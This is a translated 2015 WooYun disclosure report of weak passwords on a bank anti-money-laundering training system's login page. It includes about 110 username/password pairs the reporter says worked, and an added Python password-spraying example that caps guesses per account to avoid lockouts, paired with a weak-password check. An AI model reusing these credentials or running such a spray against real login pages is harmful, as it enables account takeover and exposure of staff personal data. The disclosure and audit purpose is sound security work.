Vulnerability Summary

Defect ID: wooyun-2015-0153122

Title: A flaw in a banking anti-money-laundering system leaks bank staff information (photos, ID card numbers, mobile numbers, dates of birth, employers, home addresses, etc.)

Affected vendor: 中国金融业培训系统 (China Financial Industry Training System)

Author: 路人甲

Submitted: 2015-11-09 20:08

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: Sensitive information disclosure

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organisation (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability Details

Disclosure status:

2015-11-09: Details sent to the vendor, awaiting vendor handling
2015-11-20: Vendor confirmed; details disclosed to the vendor only
2015-11-30: Details disclosed to core white hats and relevant domain experts
2015-12-10: Details disclosed to regular white hats
2015-12-20: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

Detailed description:

http://**.**.**.**/FxqStudent/Login.aspx

[screenshot y2.png]


lianjing/lianjing
liaoqi/liaoqi
liaoqian/liaoqian
liaoyi/liaoyi
libiao/libiao
libingbing/libingbing
zhangxiuying/zhangxiuying
wangyong/wangyong
lihong/lihong
lidanna/lidanna
lidanyang/lidanyang
lidaoru/lidaoru
lidehu/lidehu
lidemin/lidemin
lidexiong/lidexiong
lidinghe/lidinghe
lidongdong/lidongdong
lidongxiao/lidongxiao
lidujuan/lidujuan
lifangmei/lifangmei
lifengping/lifengping
lifujie/lifujie
ligangwen/ligangwen
liguanghui/liguanghui
liboxi/liboxi
wangyulan/wangyulan
lixiulan/lixiulan
wangxia/wangxia
liuchao/liuchao
zhangfengying/zhangfengying
zhaowei/zhaowei
chenchen/chenchen
wangxiuyun/wangxiuyun
yanglei/yanglei
liujianhua/liujianhua
zhanglijuan/zhanglijuan
sunxiuying/sunxiuying
wangxiuzhen/wangxiuzhen123
111111/111111
1234567/1234567
heather/heather
121212/121212
000000/000000
11111111/11111111
7777777/7777777
112233/112233
777777/777777
88888888/88888888
987654/987654
topgun/topgun
999999/999999
1q2w3e/1q2w3e
1q2w3e4r/1q2w3e4r
101010/101010
1qaz2wsx/1qaz2wsx
212121/212121
testtest/testtest
159753/159753
pppppp/pppppp
q1w2e3r4/q1w2e3r4
12341234/12341234
12121212/12121212
202020/202020
1234qwer/1234qwer
314159/314159
gogogo/gogogo
a1b2c3/a1b2c3
22222222/22222222
66666666/66666666
111222/111222
181818/181818
171717/171717
147258/147258
102030/102030
napoleon/napoleon
1111111/1111111
12344321/12344321
123789/123789
elizabeth/elizabeth
313131/313131
666999/666999
twilight/twilight
a123456/a123456
pass1234/pass1234
989898/989898
012345/012345
alucard/alucard
969696/969696
manman/manman
100000/100000
noelle/noelle
31415926/31415926
090909/090909
katherine/katherine
656565/656565
383838/383838
a1234567/a1234567
222333/222333
123aaa/123aaa
encore/encore
100100/100100
778899/778899
020202/020202
789123/789123
qwqwqw/qwqwqw
868686/868686
larry/larry123
tanker/tanker123
qwaszx/qwaszx123
heyyou/heyyou123


There are far too many weak passwords; I only ran less than 1/5 of my dictionary.
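The list above shows three guessable shapes: the username reused as the password, the username with "123" appended, and short common strings (repeated digits, keyboard walks). The following is an added example, not code from the original report, that reproduces that audit offline: the user list, the password store and the `spray`, `candidate_passwords` and `is_weak` names are all constructed for this illustration, and nothing here contacts the real FxqStudent/Login.aspx page.

```python
"""Weak-credential audit in the pattern seen in the report.

Added example, not part of the original WooYun submission. The
target, user list and password store are constructed for the demo.
"""
import hashlib
import hmac
import os
from typing import Callable, Dict, Iterable, Iterator, List, Tuple

# Constructed short list mirroring the shapes in the report
# (repeated digits, keyboard walks, word + digits).
COMMON_PASSWORDS = [
    "111111", "123456", "1q2w3e", "1qaz2wsx", "000000", "888888",
    "a123456", "pass1234", "qwaszx", "12341234", "666999",
]


def candidate_passwords(username: str,
                        common: Iterable[str] = COMMON_PASSWORDS) -> Iterator[str]:
    """Yield guesses for one account, cheapest first.

    Order matters when a lockout policy caps attempts per account:
    username-as-password and username+"123" account for most hits in
    the report, so they come before the generic dictionary.
    """
    seen = set()
    for pw in (username, username + "123", username + "1234", *common):
        if pw not in seen:
            seen.add(pw)
            yield pw


def spray(usernames: Iterable[str], verify: Callable[[str, str], bool],
          max_per_account: int = 8) -> List[Tuple[str, str]]:
    """Try at most max_per_account guesses per user; return (user, pw) hits.

    verify() is whatever proves a pair valid: an HTTP login during an
    engagement, an offline check here. The per-account cap keeps the
    spray below typical lockout thresholds.
    """
    hits = []
    for user in usernames:
        for n, pw in enumerate(candidate_passwords(user)):
            if n >= max_per_account:
                break
            if verify(user, pw):
                hits.append((user, pw))
                break
    return hits


# --- Offline stand-in for the login page (constructed) ----------------

def _pbkdf2(password: str, salt: bytes) -> bytes:
    # Iteration count kept low so the demo runs quickly.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 20_000)


def make_store(creds: Dict[str, str]) -> Dict[str, Tuple[bytes, bytes]]:
    """Constructed user store: username -> (salt, pbkdf2 digest)."""
    store = {}
    for user, pw in creds.items():
        salt = os.urandom(16)
        store[user] = (salt, _pbkdf2(pw, salt))
    return store


def make_verifier(store: Dict[str, Tuple[bytes, bytes]]) -> Callable[[str, str], bool]:
    def verify(user: str, pw: str) -> bool:
        if user not in store:
            return False
        salt, digest = store[user]
        return hmac.compare_digest(_pbkdf2(pw, salt), digest)
    return verify


# Constructed accounts: three weak in the report's patterns, one strong.
DEMO_CREDS = {
    "lianjing": "lianjing",        # username as password
    "larry": "larry123",           # username + "123"
    "wangxiuyun": "1q2w3e",        # keyboard walk from the common list
    "zhaowei": "T7#kq9!vRw2m",     # not reachable by this spray
}


def run_demo() -> List[Tuple[str, str]]:
    return spray(DEMO_CREDS, make_verifier(make_store(DEMO_CREDS)))


def is_weak(username: str, password: str,
            common: Iterable[str] = COMMON_PASSWORDS) -> bool:
    """Server-side policy check: reject anything the spray above would find."""
    return password in set(candidate_passwords(username, common))


if __name__ == "__main__":
    for user, pw in run_demo():
        print(f"{user}/{pw}")
```

`is_weak` is the registration-time and password-change check that would have stopped every pair in the list above; on the offensive side, the per-account cap in `spray` is what keeps a spray from tripping lockouts, and in a real engagement `verify` would also have to honour rate limits and the scope agreed with the owner.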

Proof of vulnerability:

[screenshot y3.png]


[screenshot y4.png]


[screenshot y5.png]

Remediation:

Reviewers, please help redact the URL and the account credentials, thank you!

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting.


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-11-20 14:35

Vendor reply:

CNVD has confirmed and reproduced the described issue and has forwarded it via CNCERT to the banking-sector informatization authority, which will coordinate remediation with the website's operating unit.

Latest status:

None yet